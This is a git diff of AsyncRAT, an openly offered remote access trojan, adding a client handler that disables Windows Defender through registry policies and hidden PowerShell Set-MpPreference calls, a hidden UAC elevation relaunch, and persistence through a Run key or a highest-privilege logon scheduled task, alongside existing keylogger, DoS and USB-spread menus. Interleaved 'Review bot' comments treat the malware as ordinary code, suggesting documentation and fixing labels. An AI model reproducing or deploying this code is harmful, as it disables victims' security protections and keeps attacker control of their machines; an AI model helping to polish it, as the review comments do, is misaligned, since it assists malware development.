diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/AsyncRAT-Sharp.csproj b/AsyncRAT-C#/AsyncRAT-Sharp/AsyncRAT-Sharp.csproj index fee5432..c5c450b 100644 --- a/AsyncRAT-C#/AsyncRAT-Sharp/AsyncRAT-Sharp.csproj +++ b/AsyncRAT-C#/AsyncRAT-Sharp/AsyncRAT-Sharp.csproj @@ -219,6 +219,8 @@ + + diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Forms/Form1.Designer.cs b/AsyncRAT-C#/AsyncRAT-Sharp/Forms/Form1.Designer.cs index 12e0864..23762ae 100644 --- a/AsyncRAT-C#/AsyncRAT-Sharp/Forms/Form1.Designer.cs +++ b/AsyncRAT-C#/AsyncRAT-Sharp/Forms/Form1.Designer.cs @@ -38,6 +38,7 @@ this.lv_os = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader())); this.lv_version = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader())); this.lv_prefor = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader())); + this.lv_admin = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader())); this.contextMenuStrip1 = new System.Windows.Forms.ContextMenuStrip(this.components); this.cLIENTOPTIONSToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem(); this.cLOSEToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem(); 
@@ -51,15 +52,18 @@ this.sENDFILETOMEMORYToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem(); this.rEMOTEDESKTOPToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem(); this.kEYLOGGERToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem(); + this.toolStripMenuItem1 = new System.Windows.Forms.ToolStripMenuItem(); this.fILEMANAGERToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem(); this.pROCESSMANAGERToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem(); + this.dISABLESToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem(); + this.wINDOWDSDEFENDERToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem(); this.bOTKILLERToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem(); this.uSBSPREADToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem(); + this.gETADMINISTRATORPRIVILEGESToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem(); this.toolStripSeparator2 = new System.Windows.Forms.ToolStripSeparator(); this.bUILDERToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem(); this.toolStripSeparator3 = new System.Windows.Forms.ToolStripSeparator(); this.aBOUTToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem(); - this.toolStripMenuItem1 = new System.Windows.Forms.ToolStripMenuItem(); this.statusStrip1 = new System.Windows.Forms.StatusStrip(); this.toolStripStatusLabel1 = new System.Windows.Forms.ToolStripStatusLabel(); this.ping = new System.Windows.Forms.Timer(this.components); @@ -103,7 +107,8 @@ this.lv_user, this.lv_os, this.lv_version, - this.lv_prefor}); + this.lv_prefor, + this.lv_admin}); this.listView1.ContextMenuStrip = this.contextMenuStrip1; this.listView1.Dock = System.Windows.Forms.DockStyle.Fill; this.listView1.FullRowSelect = true; 
@@ -154,6 +159,11 @@ this.lv_prefor.Text = "PERFORMANCE"; this.lv_prefor.Width = 170; // + // lv_admin + // + this.lv_admin.Text = "PRIVILEGES"; + this.lv_admin.Width = 138; + // // contextMenuStrip1 // this.contextMenuStrip1.ImageScalingSize = new System.Drawing.Size(24, 24); @@ -169,14 +179,16 @@ this.toolStripMenuItem1, this.fILEMANAGERToolStripMenuItem, this.pROCESSMANAGERToolStripMenuItem, + this.dISABLESToolStripMenuItem, this.bOTKILLERToolStripMenuItem, this.uSBSPREADToolStripMenuItem, + this.gETADMINISTRATORPRIVILEGESToolStripMenuItem, this.toolStripSeparator2, this.bUILDERToolStripMenuItem, this.toolStripSeparator3, this.aBOUTToolStripMenuItem}); this.contextMenuStrip1.Name = "contextMenuStrip1"; - this.contextMenuStrip1.Size = new System.Drawing.Size(283, 442); + this.contextMenuStrip1.Size = new System.Drawing.Size(283, 502); // // cLIENTOPTIONSToolStripMenuItem // @@ -271,6 +283,14 @@ this.kEYLOGGERToolStripMenuItem.Text = "KEYLOGGER"; this.kEYLOGGERToolStripMenuItem.Click += new System.EventHandler(this.KEYLOGGERToolStripMenuItem_Click); // + // toolStripMenuItem1 + // + this.toolStripMenuItem1.Image = global::AsyncRAT_Sharp.Properties.Resources.ddos; + this.toolStripMenuItem1.Name = "toolStripMenuItem1"; + this.toolStripMenuItem1.Size = new System.Drawing.Size(282, 30); + this.toolStripMenuItem1.Text = "DOS ATTACK"; + this.toolStripMenuItem1.Click += new System.EventHandler(this.ToolStripMenuItem1_Click); + // // fILEMANAGERToolStripMenuItem // this.fILEMANAGERToolStripMenuItem.Image = global::AsyncRAT_Sharp.Properties.Resources.filemanager; 
@@ -287,6 +307,22 @@ this.pROCESSMANAGERToolStripMenuItem.Text = "PROCESS MANAGER"; this.pROCESSMANAGERToolStripMenuItem.Click += new System.EventHandler(this.pROCESSMANAGERToolStripMenuItem_Click); // + // dISABLESToolStripMenuItem + // + this.dISABLESToolStripMenuItem.DropDownItems.AddRange(new System.Windows.Forms.ToolStripItem[] { + this.wINDOWDSDEFENDERToolStripMenuItem}); + this.dISABLESToolStripMenuItem.Image = global::AsyncRAT_Sharp.Properties.Resources.disabled; + this.dISABLESToolStripMenuItem.Name = "dISABLESToolStripMenuItem"; + this.dISABLESToolStripMenuItem.Size = new System.Drawing.Size(282, 30); + this.dISABLESToolStripMenuItem.Text = "DISABLES"; + // + // wINDOWDSDEFENDERToolStripMenuItem + // + this.wINDOWDSDEFENDERToolStripMenuItem.Name = "wINDOWDSDEFENDERToolStripMenuItem"; + this.wINDOWDSDEFENDERToolStripMenuItem.Size = new System.Drawing.Size(289, 30); + this.wINDOWDSDEFENDERToolStripMenuItem.Text = "WINDOWDS DEFENDER"; + this.wINDOWDSDEFENDERToolStripMenuItem.Click += new System.EventHandler(this.WINDOWDSDEFENDERToolStripMenuItem_Click); + // // bOTKILLERToolStripMenuItem // this.bOTKILLERToolStripMenuItem.Image = global::AsyncRAT_Sharp.Properties.Resources.botkiller; 
@@ -303,6 +339,14 @@ this.uSBSPREADToolStripMenuItem.Text = "USB SPREAD"; this.uSBSPREADToolStripMenuItem.Click += new System.EventHandler(this.USBSPREADToolStripMenuItem_Click); // + // gETADMINISTRATORPRIVILEGESToolStripMenuItem + // + this.gETADMINISTRATORPRIVILEGESToolStripMenuItem.Image = global::AsyncRAT_Sharp.Properties.Resources.uac; + this.gETADMINISTRATORPRIVILEGESToolStripMenuItem.Name = "gETADMINISTRATORPRIVILEGESToolStripMenuItem"; + this.gETADMINISTRATORPRIVILEGESToolStripMenuItem.Size = new System.Drawing.Size(282, 30); + this.gETADMINISTRATORPRIVILEGESToolStripMenuItem.Text = "GET ADMIN PRIVILEGES"; + this.gETADMINISTRATORPRIVILEGESToolStripMenuItem.Click += new System.EventHandler(this.GETADMINISTRATORPRIVILEGESToolStripMenuItem_Click); + // // toolStripSeparator2 // this.toolStripSeparator2.Name = "toolStripSeparator2"; @@ -329,14 +373,6 @@ this.aBOUTToolStripMenuItem.Text = "ABOUT"; this.aBOUTToolStripMenuItem.Click += new System.EventHandler(this.ABOUTToolStripMenuItem_Click); // - // toolStripMenuItem1 - // - this.toolStripMenuItem1.Image = global::AsyncRAT_Sharp.Properties.Resources.ddos; - this.toolStripMenuItem1.Name = "toolStripMenuItem1"; - this.toolStripMenuItem1.Size = new System.Drawing.Size(282, 30); - this.toolStripMenuItem1.Text = "DOS ATTACK"; - this.toolStripMenuItem1.Click += new System.EventHandler(this.ToolStripMenuItem1_Click); - // // statusStrip1 // this.statusStrip1.ImageScalingSize = new System.Drawing.Size(24, 24); 
@@ -598,6 +634,10 @@ private System.Windows.Forms.ContextMenuStrip contextMenuStrip3; private System.Windows.Forms.ToolStripMenuItem notificationOFFToolStripMenuItem; private System.Windows.Forms.ToolStripMenuItem toolStripMenuItem1; + private System.Windows.Forms.ToolStripMenuItem dISABLESToolStripMenuItem; + private System.Windows.Forms.ToolStripMenuItem wINDOWDSDEFENDERToolStripMenuItem; + private System.Windows.Forms.ToolStripMenuItem gETADMINISTRATORPRIVILEGESToolStripMenuItem; + private System.Windows.Forms.ColumnHeader lv_admin; } } diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Forms/Form1.cs b/AsyncRAT-C#/AsyncRAT-Sharp/Forms/Form1.cs index c223b0f..3fa3288 100644 --- a/AsyncRAT-C#/AsyncRAT-Sharp/Forms/Form1.cs +++ b/AsyncRAT-C#/AsyncRAT-Sharp/Forms/Form1.cs @@ -42,7 +42,7 @@ namespace AsyncRAT_Sharp { if (!File.Exists(Path.Combine(Application.StartupPath, Path.GetFileName(Application.ExecutablePath) + ".config"))) { - // File.WriteAllText(Path.Combine(Application.StartupPath, Path.GetFileName(Application.ExecutablePath) + ".config"), Properties.Resources.AsyncRAT_Sharp_exe); + // File.WriteAllText(Path.Combine(Application.StartupPath, Path.GetFileName(Application.ExecutablePath) + ".config"), Properties.Resources.AsyncRAT_Sharp_exe); Process.Start(Application.ExecutablePath); Environment.Exit(0); } 
@@ -224,20 +224,24 @@ namespace AsyncRAT_Sharp { if (listView1.SelectedItems.Count > 0) { - try + DialogResult dialogResult = MessageBox.Show(this, "Are you sure you want to unistall", "AsyncRAT | Unistall", MessageBoxButtons.YesNo, MessageBoxIcon.Information); + if (dialogResult == DialogResult.Yes) { - MsgPack msgpack = new MsgPack(); - msgpack.ForcePathObject("Packet").AsString = "uninstall"; - foreach (ListViewItem itm in listView1.SelectedItems) + try { - Clients client = (Clients)itm.Tag; - ThreadPool.QueueUserWorkItem(client.BeginSend, msgpack.Encode2Bytes()); + MsgPack msgpack = new MsgPack(); + msgpack.ForcePathObject("Packet").AsString = "uninstall"; + foreach (ListViewItem itm in listView1.SelectedItems) + { + Clients client = (Clients)itm.Tag; + ThreadPool.QueueUserWorkItem(client.BeginSend, msgpack.Encode2Bytes()); + } + } + catch (Exception ex) + { + MessageBox.Show(ex.Message); + return; } - } - catch (Exception ex) - { - MessageBox.Show(ex.Message); - return; } } } 
@@ -644,10 +648,68 @@ namespace AsyncRAT_Sharp Properties.Settings.Default.Save(); } - private readonly FormDOS formDOS = new FormDOS(); + private readonly FormDOS formDOS = new FormDOS(); private void ToolStripMenuItem1_Click(object sender, EventArgs e) { formDOS.Show(); } + + private void WINDOWDSDEFENDERToolStripMenuItem_Click(object sender, EventArgs e) + { + if (listView1.SelectedItems.Count > 0) + { + DialogResult dialogResult = MessageBox.Show(this, "Administrator privileges are required!", "AsyncRAT | Disbale Defender", MessageBoxButtons.YesNo, MessageBoxIcon.Information); + if (dialogResult == DialogResult.Yes) + { + try + { + MsgPack msgpack = new MsgPack(); + msgpack.ForcePathObject("Packet").AsString = "defender"; + foreach (ListViewItem itm in listView1.SelectedItems) + { + if (itm.SubItems[lv_admin.Index].Text == "Administrator") + { + Clients client = (Clients)itm.Tag; + ThreadPool.QueueUserWorkItem(client.BeginSend, msgpack.Encode2Bytes()); + } + } + } + catch (Exception ex) + { + MessageBox.Show(ex.Message); + return; + } + } + } + } + + private void GETADMINISTRATORPRIVILEGESToolStripMenuItem_Click(object sender, EventArgs e) + { + if (listView1.SelectedItems.Count > 0) + { + DialogResult dialogResult = MessageBox.Show(this, "Popup UAC prompt? ", "AsyncRAT | Disbale Defender", MessageBoxButtons.YesNo, MessageBoxIcon.Information); + if (dialogResult == DialogResult.Yes) + { + try + { + MsgPack msgpack = new MsgPack(); + msgpack.ForcePathObject("Packet").AsString = "uac"; + foreach (ListViewItem itm in listView1.SelectedItems) + { + if (itm.SubItems[lv_admin.Index].Text != "Administrator") + { + Clients client = (Clients)itm.Tag; + ThreadPool.QueueUserWorkItem(client.BeginSend, msgpack.Encode2Bytes()); + } + } + } + catch (Exception ex) + { + MessageBox.Show(ex.Message); + return; + } + } + } + } } } \ No newline at end of file 
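Review bot: Both new handlers in Form1.cs decide which clients receive a packet by comparing `itm.SubItems[lv_admin.Index].Text` with `"Administrator"`, and nothing here says that this text is whatever the client reported in its `Admin` field (added to HandleListView.cs in this commit), so the filter is a display convenience rather than a verified privilege check. A summary comment on each handler would make that explicit, for example `// Queues the "defender" packet only for rows whose PRIVILEGES column reads "Administrator" (client-reported, not verified).` The confirmation in `GETADMINISTRATORPRIVILEGESToolStripMenuItem_Click` also reuses the title `"AsyncRAT | Disbale Defender"` from the handler above it, so the operator is shown the wrong action name. The enclosing class starts outside the hunk.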
diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Handle Packet/HandleListView.cs b/AsyncRAT-C#/AsyncRAT-Sharp/Handle Packet/HandleListView.cs index 9896812..42ba928 100644 --- a/AsyncRAT-C#/AsyncRAT-Sharp/Handle Packet/HandleListView.cs +++ b/AsyncRAT-C#/AsyncRAT-Sharp/Handle Packet/HandleListView.cs @@ -31,6 +31,7 @@ namespace AsyncRAT_Sharp.Handle_Packet client.LV.SubItems.Add(unpack_msgpack.ForcePathObject("OS").AsString); client.LV.SubItems.Add(unpack_msgpack.ForcePathObject("Version").AsString); client.LV.SubItems.Add(unpack_msgpack.ForcePathObject("Performance").AsString); + client.LV.SubItems.Add(unpack_msgpack.ForcePathObject("Admin").AsString); client.LV.ToolTipText = unpack_msgpack.ForcePathObject("Path").AsString; client.ID = unpack_msgpack.ForcePathObject("HWID").AsString; Program.form1.listView1.Items.Add(client.LV); diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Properties/Resources.Designer.cs b/AsyncRAT-C#/AsyncRAT-Sharp/Properties/Resources.Designer.cs index bd510c9..256d970 100644 --- a/AsyncRAT-C#/AsyncRAT-Sharp/Properties/Resources.Designer.cs +++ b/AsyncRAT-C#/AsyncRAT-Sharp/Properties/Resources.Designer.cs @@ -144,6 +144,16 @@ namespace AsyncRAT_Sharp.Properties { } } + /// + /// Looks up a localized resource of type System.Drawing.Bitmap. + /// + internal static System.Drawing.Bitmap disabled { + get { + object obj = ResourceManager.GetObject("disabled", resourceCulture); + return ((System.Drawing.Bitmap)(obj)); + } + } + /// /// Looks up a localized resource of type System.Drawing.Bitmap. /// @@ -264,6 +274,16 @@ namespace AsyncRAT_Sharp.Properties { } } + /// + /// Looks up a localized resource of type System.Drawing.Bitmap. + /// + internal static System.Drawing.Bitmap uac { + get { + object obj = ResourceManager.GetObject("uac", resourceCulture); + return ((System.Drawing.Bitmap)(obj)); + } + } + /// /// Looks up a localized resource of type System.Drawing.Bitmap. /// 
diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Properties/Resources.resx b/AsyncRAT-C#/AsyncRAT-Sharp/Properties/Resources.resx index 9392c35..48843c2 100644 --- a/AsyncRAT-C#/AsyncRAT-Sharp/Properties/Resources.resx +++ b/AsyncRAT-C#/AsyncRAT-Sharp/Properties/Resources.resx @@ -130,9 +130,18 @@ ..\Resources\arrow_up.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a + + ..\Resources\ddos.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a + ..\Resources\play-button.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a + + ..\Resources\disabled.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a + + + ..\Resources\AsyncRAT-Sharp.exe.config;System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089;Windows-1252 + ..\Resources\botkiller.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a @@ -178,10 +187,7 @@ ..\Resources\visit.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a - - ..\Resources\ddos.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a - - - ..\Resources\AsyncRAT-Sharp.exe.config;System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089;Windows-1252 + + ..\Resources\uac.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a \ No newline at end of file diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Resources/disabled.png b/AsyncRAT-C#/AsyncRAT-Sharp/Resources/disabled.png new file mode 100644 index 0000000..979db92 Binary files /dev/null and b/AsyncRAT-C#/AsyncRAT-Sharp/Resources/disabled.png differ 
diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Resources/uac.png b/AsyncRAT-C#/AsyncRAT-Sharp/Resources/uac.png new file mode 100644 index 0000000..72e9d43 Binary files /dev/null and b/AsyncRAT-C#/AsyncRAT-Sharp/Resources/uac.png differ diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Settings.cs b/AsyncRAT-C#/AsyncRAT-Sharp/Settings.cs index 7186c31..c2b65f1 100644 --- a/AsyncRAT-C#/AsyncRAT-Sharp/Settings.cs +++ b/AsyncRAT-C#/AsyncRAT-Sharp/Settings.cs @@ -14,6 +14,6 @@ namespace AsyncRAT_Sharp public static string Password { get; set; } public static Aes256 AES{ get; set; } - public static readonly string Version = "AsyncRAT 0.4.6"; + public static readonly string Version = "AsyncRAT 0.4.7"; } } diff --git a/AsyncRAT-C#/Client/Client.csproj b/AsyncRAT-C#/Client/Client.csproj index b48ce74..4fc68ff 100644 --- a/AsyncRAT-C#/Client/Client.csproj +++ b/AsyncRAT-C#/Client/Client.csproj @@ -80,7 +80,9 @@ + + diff --git a/AsyncRAT-C#/Client/Handle Packet/HandleUAC.cs b/AsyncRAT-C#/Client/Handle Packet/HandleUAC.cs new file mode 100644 index 0000000..4204720 --- /dev/null +++ b/AsyncRAT-C#/Client/Handle Packet/HandleUAC.cs @@ -0,0 +1,36 @@ +using Microsoft.Win32; +using System; +using System.Collections.Generic; +using System.Diagnostics; +using System.IO; +using System.Linq; +using System.Security.Principal; +using System.Text; + +namespace Client.Handle_Packet +{ + public class HandleUAC + { + public HandleUAC() + { + if (new WindowsPrincipal(WindowsIdentity.GetCurrent()).IsInRole(WindowsBuiltInRole.Administrator)) return; + + try + { + Process proc = new Process + { + StartInfo = new ProcessStartInfo + { + FileName = Process.GetCurrentProcess().MainModule.FileName, + WindowStyle = ProcessWindowStyle.Hidden, + CreateNoWindow = true, + Verb = "runas" + } + }; + proc.Start(); + Environment.Exit(0); + } + catch { } + } + } +} diff --git a/AsyncRAT-C#/Client/Handle Packet/HandleUninstall.cs b/AsyncRAT-C#/Client/Handle Packet/HandleUninstall.cs index 2157f7b..ebfe442 100644 
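Review bot: HandleUAC.cs does all of its work in the constructor and documents none of it: when the process is not elevated it starts a second copy of the current executable with `Verb = "runas"` and then calls `Environment.Exit(0)`, and the empty `catch { }` hides every failure, which presumably includes a declined consent prompt. A doc comment should state that effect, e.g. `/// Relaunches the current image with the "runas" verb and exits this process; does nothing when already elevated.` For anyone analysing a host, the visible side of this code is a UAC consent prompt for the client binary followed by the same image restarting, so an unexpected prompt of that kind is worth treating as a signal.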
--- a/AsyncRAT-C#/Client/Handle Packet/HandleUninstall.cs +++ b/AsyncRAT-C#/Client/Handle Packet/HandleUninstall.cs @@ -5,6 +5,7 @@ using System.Collections.Generic; using System.Diagnostics; using System.IO; using System.Linq; +using System.Security.Principal; using System.Text; namespace Client.Handle_Packet @@ -17,9 +18,22 @@ namespace Client.Handle_Packet { try { - Registry.CurrentUser.CreateSubKey(@"Software\Microsoft\Windows\CurrentVersion\Run\").DeleteValue(Path.GetFileName(Settings.ClientFullPath)); + if (!new WindowsPrincipal(WindowsIdentity.GetCurrent()).IsInRole(WindowsBuiltInRole.Administrator)) + Registry.CurrentUser.CreateSubKey(@"SOFTWARE\Microsoft\Windows\CurrentVersion\Run").DeleteValue(Path.GetFileName(Settings.ClientFullPath)); + else + { + Process.Start(new ProcessStartInfo() + { + FileName = "schtasks", + Arguments = $"/delete /tn {Path.GetFileName(Settings.ClientFullPath)} /f", + CreateNoWindow = true, + ErrorDialog = false, + UseShellExecute = true, + WindowStyle = ProcessWindowStyle.Hidden + }); } - catch { } + } + catch { } } ProcessStartInfo Del = null; try diff --git a/AsyncRAT-C#/Client/Handle Packet/HandleWindowsDefender.cs b/AsyncRAT-C#/Client/Handle Packet/HandleWindowsDefender.cs new file mode 100644 index 0000000..ba23c4b --- /dev/null +++ b/AsyncRAT-C#/Client/Handle Packet/HandleWindowsDefender.cs 
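Review bot: In HandleUninstall.cs the startup entry that gets removed is chosen by the token the process holds at uninstall time (the HKCU `Run` value when not elevated, `schtasks /delete` when elevated), while NormalStartup.cs, later in this commit, chooses the location by the token held at install time, and the two are not documented as a pair. If the privilege level differs between the two moments, which the new `uac` packet makes possible, the other entry appears to be left in place. A comment above the branch would record this, e.g. `// Removes only the entry matching the current token: HKCU Run value (non-admin) or scheduled task (admin).` When cleaning a host, check both the `Run` value and the logon task named after the client file instead of relying on this path. The method body continues outside the hunk.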
@@ -0,0 +1,129 @@ +using System; +using Microsoft.Win32; +using System.Diagnostics; +using System.Security.Principal; + +// │ Author : NYAN CAT +// │ Name : Disable Windows Defender v1.0 +// │ Contact : https://github.com/NYAN-x-CAT + +// This program is distributed for educational purposes only. + +namespace Client.Handle_Packet +{ + public class HandleWindowsDefender + { + public HandleWindowsDefender() + { + if (!new WindowsPrincipal(WindowsIdentity.GetCurrent()).IsInRole(WindowsBuiltInRole.Administrator)) return; + + RegistryEdit(@"SOFTWARE\Policies\Microsoft\Windows Defender", "DisableAntiSpyware", "1"); + RegistryEdit(@"SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection", "DisableBehaviorMonitoring", "1"); + RegistryEdit(@"SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection", "DisableOnAccessProtection", "1"); + RegistryEdit(@"SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection", "DisableScanOnRealtimeEnable", "1"); + RegistryEdit(@"SOFTWARE\Microsoft\Windows Defender\Features", "TamperProtection", "0"); //Windows 10 1903 Redstone 6 + + CheckDefender(); + } + + private static void RegistryEdit(string regPath, string name, string value) + { + try + { + using (RegistryKey key = Registry.LocalMachine.OpenSubKey(regPath, RegistryKeyPermissionCheck.ReadWriteSubTree)) + { + if (key == null) + { + Registry.LocalMachine.CreateSubKey(regPath).SetValue(name, value, RegistryValueKind.DWord); + return; + } + if (key.GetValue(name) != (object)value) + key.SetValue(name, value, RegistryValueKind.DWord); + } + } + catch { } + } + + private static void CheckDefender() + { + Process proc = new Process + { + StartInfo = new ProcessStartInfo + { + FileName = "powershell", + Arguments = "Get-MpPreference -verbose", + UseShellExecute = false, + RedirectStandardOutput = true, + WindowStyle = ProcessWindowStyle.Hidden, + CreateNoWindow = true + } + }; + proc.Start(); + while (!proc.StandardOutput.EndOfStream) + { + string line = 
proc.StandardOutput.ReadLine(); + + if (line.Contains(@"DisableRealtimeMonitoring") && line.Contains("False")) + RunPS("Set-MpPreference -DisableRealtimeMonitoring $true"); //real-time protection + + else if (line.Contains(@"DisableBehaviorMonitoring") && line.Contains("False")) + RunPS("Set-MpPreference -DisableBehaviorMonitoring $true"); //behavior monitoring + + else if (line.Contains(@"DisableBlockAtFirstSeen") && line.Contains("False")) + RunPS("Set-MpPreference -DisableBlockAtFirstSeen $true"); + + else if (line.Contains(@"DisableIOAVProtection") && line.Contains("False")) + RunPS("Set-MpPreference -DisableIOAVProtection $true"); //scans all downloaded files and attachments + + else if (line.Contains(@"DisablePrivacyMode") && line.Contains("False")) + RunPS("Set-MpPreference -DisablePrivacyMode $true"); //displaying threat history + + else if (line.Contains(@"SignatureDisableUpdateOnStartupWithoutEngine") && line.Contains("False")) + RunPS("Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true"); //definition updates on startup + + else if (line.Contains(@"DisableArchiveScanning") && line.Contains("False")) + RunPS("Set-MpPreference -DisableArchiveScanning $true"); //scan archive files, such as .zip and .cab files + + else if (line.Contains(@"DisableIntrusionPreventionSystem") && line.Contains("False")) + RunPS("Set-MpPreference -DisableIntrusionPreventionSystem $true"); // network protection + + else if (line.Contains(@"DisableScriptScanning") && line.Contains("False")) + RunPS("Set-MpPreference -DisableScriptScanning $true"); //scanning of scripts during scans + + else if (line.Contains(@"SubmitSamplesConsent") && !line.Contains("2")) + RunPS("Set-MpPreference -SubmitSamplesConsent 2"); //MAPSReporting + + else if (line.Contains(@"MAPSReporting") && !line.Contains("0")) + RunPS("Set-MpPreference -MAPSReporting 0"); //MAPSReporting + + else if (line.Contains(@"HighThreatDefaultAction") && !line.Contains("6")) + RunPS("Set-MpPreference 
-HighThreatDefaultAction 6 -Force"); // high level threat // Allow + + else if (line.Contains(@"ModerateThreatDefaultAction") && !line.Contains("6")) + RunPS("Set-MpPreference -ModerateThreatDefaultAction 6"); // moderate level threat + + else if (line.Contains(@"LowThreatDefaultAction") && !line.Contains("6")) + RunPS("Set-MpPreference -LowThreatDefaultAction 6"); // low level threat + + else if (line.Contains(@"SevereThreatDefaultAction") && !line.Contains("6")) + RunPS("Set-MpPreference -SevereThreatDefaultAction 6"); // severe level threat + } + } + + private static void RunPS(string args) + { + Process proc = new Process + { + StartInfo = new ProcessStartInfo + { + FileName = "powershell", + Arguments = args, + WindowStyle = ProcessWindowStyle.Hidden, + CreateNoWindow = true + } + }; + proc.Start(); + } + + } +} diff --git a/AsyncRAT-C#/Client/Handle Packet/Packet.cs b/AsyncRAT-C#/Client/Handle Packet/Packet.cs index 7836bac..eac8782 100644 --- a/AsyncRAT-C#/Client/Handle Packet/Packet.cs +++ b/AsyncRAT-C#/Client/Handle Packet/Packet.cs @@ -25,35 +25,47 @@ namespace Client.Handle_Packet case "sendMessage": { MessageBox.Show(unpack_msgpack.ForcePathObject("Message").AsString); + break; } - break; case "Ping": { Debug.WriteLine("Server Pinged me " + unpack_msgpack.ForcePathObject("Message").AsString); + break; } - break; case "thumbnails": { new HandleGetScreenShot(); + break; } - break; case "sendFile": { Received(); new HandleSendTo().SendToDisk(unpack_msgpack); + break; } - break; case "sendMemory": { Received(); new HandleSendTo().SendToMemory(unpack_msgpack); + break; + } + + case "defender": + { + new HandleWindowsDefender(); + break; + } + + case "uac": + { + new HandleUAC(); + break; } - break; case "close": { @@ -64,8 +76,8 @@ namespace Client.Handle_Packet } catch { } Environment.Exit(0); + break; } - break; case "restart": { 
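Review bot: HandleWindowsDefender.cs makes machine-wide changes that outlive the client and says so nowhere: the constructor writes `DisableAntiSpyware` and three `Real-Time Protection` values under `HKLM\SOFTWARE\Policies\Microsoft\Windows Defender`, sets `TamperProtection` under `SOFTWARE\Microsoft\Windows Defender\Features`, and `CheckDefender` issues `Set-MpPreference` calls from hidden `powershell` processes. No hunk in this commit restores any of these; the HandleUninstall.cs change only removes the startup entry (its body continues outside the hunk), so removing the client would not bring protection back. The class should carry a doc comment listing every value and preference it modifies so the full set can be audited and reverted. On the defensive side these writes and the `Get-MpPreference`/`Set-MpPreference` child processes are observable events, and Defender's Tamper Protection is designed to refuse this kind of change.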
@@ -77,14 +89,14 @@ namespace Client.Handle_Packet catch { } Process.Start(Application.ExecutablePath); Environment.Exit(0); + break; } - break; case "uninstall": { new HandleUninstall(); + break; } - break; case "usbSpread": { diff --git a/AsyncRAT-C#/Client/Install/NormalStartup.cs b/AsyncRAT-C#/Client/Install/NormalStartup.cs index bdf14dd..0b53413 100644 --- a/AsyncRAT-C#/Client/Install/NormalStartup.cs +++ b/AsyncRAT-C#/Client/Install/NormalStartup.cs @@ -3,6 +3,8 @@ using Microsoft.Win32; using System; using System.Diagnostics; using System.IO; +using System.Security.Principal; +using System.Threading; namespace Client.Install { @@ -29,14 +31,31 @@ namespace Client.Install FileStream fs; if (File.Exists(Settings.ClientFullPath)) + { + File.Delete(Settings.ClientFullPath); + Thread.Sleep(1000); fs = new FileStream(Settings.ClientFullPath, FileMode.Create); + } else fs = new FileStream(Settings.ClientFullPath, FileMode.CreateNew); byte[] clientExe = File.ReadAllBytes(Process.GetCurrentProcess().MainModule.FileName); fs.Write(clientExe, 0, clientExe.Length); fs.Dispose(); - Registry.CurrentUser.CreateSubKey(@"Software\Microsoft\Windows\CurrentVersion\Run\").SetValue(Path.GetFileName(Settings.ClientFullPath), Settings.ClientFullPath); + if (!new WindowsPrincipal(WindowsIdentity.GetCurrent()).IsInRole(WindowsBuiltInRole.Administrator)) + Registry.CurrentUser.CreateSubKey(@"SOFTWARE\Microsoft\Windows\CurrentVersion\Run").SetValue(Path.GetFileName(Settings.ClientFullPath), Settings.ClientFullPath); + else + { + Process.Start(new ProcessStartInfo() + { + FileName = "schtasks", + Arguments = $"/create /sc onlogon /rl highest /tn {Path.GetFileName(Settings.ClientFullPath)} /tr " + "\"" + Settings.ClientFullPath + "\"", + CreateNoWindow = true, + ErrorDialog = false, + UseShellExecute = true, + WindowStyle = ProcessWindowStyle.Hidden + }); + } Methods.CloseMutex(); Process.Start(Settings.ClientFullPath); Environment.Exit(0); 
